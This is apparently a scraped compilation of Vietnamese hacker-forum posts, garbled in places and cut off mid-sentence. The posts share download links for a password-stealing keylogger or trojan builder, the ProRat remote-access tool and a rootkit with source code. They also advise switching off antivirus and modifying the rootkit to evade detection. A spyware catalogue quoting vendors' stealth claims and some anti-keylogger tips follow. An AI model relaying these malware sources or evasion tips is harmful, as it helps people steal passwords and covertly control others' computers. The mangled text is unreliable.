Link moi day anh em test thu nhe file keyloger dùng tạo ra trojon lấy pass http://www.uploading.com/get.php\?get=7Y5RX02C 2>bạn nhập số vào bên góc trái màn hình và nhấp vào Start dowloa
Trang 1Link moi day anh em test thu nhe
file keyloger (dùng tạo ra trojon lấy pass)
http://www.uploading.com/get.php\?get=7Y5RX02C
2>bạn nhập số vào bên góc trái màn hình và nhấp vào Start dowload và tải về bạn chờ 25 giây và kích chuột vào Click here to download để tải về
Backdoor(VNISS)
Hi , em để lại vài kinh nghiệm cho mọi người để khỏi bị dính keylog nhé
+ Trong pass để vài dấu cách , trojan sẽ không nhận biết được dấu cách , mình thấy
có mỗi loại bpk203 là khi gặp 1 dấu cách nó sẽ xuống 1 dòng
+ Cách thứ 2 là chia pass ra làm 2 đoạn , đánh đoạn 2 trước , đoạn 1 sau , VD như pass=NgocQuang thì đánh Quang trước sau đó chỉ chuột về đầu dòng ( hoặc nhấn Home ) rồi đánh tiếp Ngọc
+ Cách 3 là đánh pass kiểu pass trong thư của tên harker chỉ hiện lên là pass , cói
thể thay chữ b bằng chữ i
+ Cách 4 là đi chat ngoài hàng thì nên mang theo USB , trong USB có cop
BKAV2006 , mở BKAV trước rồi mới chat Cách này dễ bị lây nhiễm Vius về máy mình lắm
-Cách khác là không mở những tin nhắn kiểu http:// kể cả nhưng tin nhắn có đuôi *.gif , *.jpg ,*.wmv , Một sỗ trojan có thể được gắn lên File ảnh và File nhạc Bạn gửi cho file có File đuôi *.exe mà ai mở ra thì công nhận là không còn
gì dại bằng Thường 1 ai đó muốn Share virus cho mọi người dùng cùng thì sẽ để
nó dưới File nén kiểu *.zip hay *.rar để các trang cho upload không phát hiện ra đó
là virus
- Cách hay nhất chưa bao giờ bị miss , đó là không đi chat Ai dùng cách này mà còn bị thì thôi bó tay
Ronan_keating(VNISS)
Trang 2ProRat_v1.9_Fix2
Code:
http://www.prorat.net/download/ProRat_v1.9.zip
P/S: "A device attached to the system is not functioning" -> tắt cái antivirus đi bung nén ra thì ko gặp lỗi này nữa!
@YeuEmDaiKho(HCE)
RootKit + Source Code
Right Now rootkit is detectable by some Antiviruses
To make it undectable you can modify the source code to make ur own RootKit Its a cool and powerful tool That can give u complete control of the R - Host
Download:
Trang 3Code:
http://hxdef.net.ru/download/hxdef100.zip
YeuEmDaiKho(HCE)
spyware guide and removal instructions
Lướt web thấy bài viết rất cần thiết cho những ai quan tâm đến spyware và cách phòng tránh mình xin share bài viết này đến các bạn
007 Spy Software
This product can be used for more than simply montioring keystrokes It can set up monitoring schedules to watch web pages that are visited It also has a "solid
stealth technology that prevents virus scanners and spyware detectors from
finding/disabling it." (From their website
:http://www.e-spy-software.com/index.htm) From their website: "007 Spy Software is a stealthy
computer monitoring software which allows you to secretly record all activities of computer users and automatically deliver logs to you via Email or FTP, including all areas of the system such as email sent, Web sites visited, every keystroke
(including login/password of ICQ, MSN, AOL, AIM, and Yahoo Messenger or Webmail), file operations, online chat conversation, and take screen snapshot at set intervals just like a surveillance camera directly point at the computer monitor." http://www.e-spy-software.com/index.htm
-
123 PC Spy
123 PC Spy Key can record keystrokes, visited websites, and active programs I can also capture screenshots and run invisible in the background It sends the user a log via e-mail From their site "123 PC Spy is a powerful while easy-to-use spy utility that runs stealthly under MS Windows This spyware allows you to monitor and record almost all activities on your PC, then it can create reports and send them to your expected email."
http://www.pcspy.info/
-
Trang 4123mania
Also known as: MatrixDialer 123 mania
This is a spanish born adware
http://www.123mania.com
-
123Messenger
Spanish Shopping Portal Dialer Translated roughly from the vendor in Spanish:
"Contract of User: Using our program you specifically recognize and accept the following warnings and conditions: 1) the access to this Web, ace Ý like a its contents and services estß ·nicamente allowed to people of legal age 2) You must
be of legal age in his paÝs of residence (in the case of Espa±a, greater of 18 a±os) 3) When accepting the "Certificate of security" or the unloading of the file that shows its navigator, knows that instalarßn in its PC the programs that permitirßn to connect to him with our services AsÝmismo, for its comfort, colocarßn direct access in its system to facilitate pr¾ximas to him connections 4) You not exhibirß this material to minors or any other person who can be victim or who do not fulfill these conditions 5) You deberß to pay the costs of conexi¾n telef¾nica Knowing that to the program him desconectarß automßticamente of present his conexi¾n and him conectarß to a special n·mero of tarificaci¾n 906 Price MAXIMO per minute is of 1.06 euros from the fixed network of telefonÝa, and 1.357 euros from the m¾vil network, taxes including You tambiÚn know that at any time podrß to
to this end become disconnected of our services using bot¾n existing,
extinguishing his m¾dem or hanging telÚfono seg·n comes in each case The system him desconectarß automßticamente passed 30 minutes, deciding you freely
if you wish to connect again 6) All the rights of copyright and any other rights of intellectual and industrial property are reserved in favor of the holders, authors, publishers, people in charge and/or proprietors of this Web AsÝmismo recognizes that estarßn in any case exentos of any responsibilities of Ýndole personal and/or econ¾mica that could derive: ã) Of the access of minors 6b) Of utilizaci¾n of the program or software that allows the access to the services 6c) Of the access and/or utilizaci¾n that any user makes of the contents and services 7) For resoluci¾n of any controversies to raÝz of the present document, of the access to the Web or anyone of his contents, you he is specifically put under the espa±olas laws and jurisdicci¾n of the courts and courts of the city of Madrid, Espa±a, to which he confers ·nica competition exclusively and 8) we requested to Him that if does not
Trang 5understand, does not fulfill or it does not accept some of the ends contained in the present contract does not continue with conexi¾n Identificativos Data: Matrix Technology Network, S.A CIF A-83491530 Apdo 28080 Post office 13180 - Madrid"
http://www.masminutos.com
-
123Search
Also known as: Search123
This is a BHO Side effects will be a likely decrease in system performance They have a pay-per-click search engine
http://www.search123.com/directory.html
-
17lele
Also known as: ADW_17lele (TrendMicro) Adware-17Lele (Mcafee) Trojan-Downloader.Win32.Agent.et (Kaspersky) TR/Dldr.Agent.ET
Trojan.Downloader.Agent.Et.S
Connect to the internet and downloads files without users knowledge
-
180 Search Assistant
Also known as: Other Products: SVA Player SVAPlayer 180solutions 180
solutions MetricsDirect 180search Assistant 180 search Assistant
Company appears to have evolved from the old "paid-to-surf" program Epipo Comes along with some "advertiser supported" programs, a tactic known as
bundling Depending on the program (180 Solutions markets several) it may
pop-up ads or in the case of the Zango application it may pop-pop-up other websites based
on keywords you use while surfing or searching It is important to note that 180 Solutions derives financial benefit by popping up these 3rd party websites To the best of our knowledge 180 Solutions does not track or store personally identifiable information as per their privacy policy However it does transmits logs of every web page you visit The URL or keyword is passed with a unique identifier to their advertising server when a targeted advertisement is shown With the later versions
of their software this logging can be disabled by using the tray icon Heavily
distributed through the use of "affiliates" via a process called bundling Recent research by Ben Edelman (http://www.edelman.org) reports that it has been
installed via browser security holes We have also noted that 180 Solutions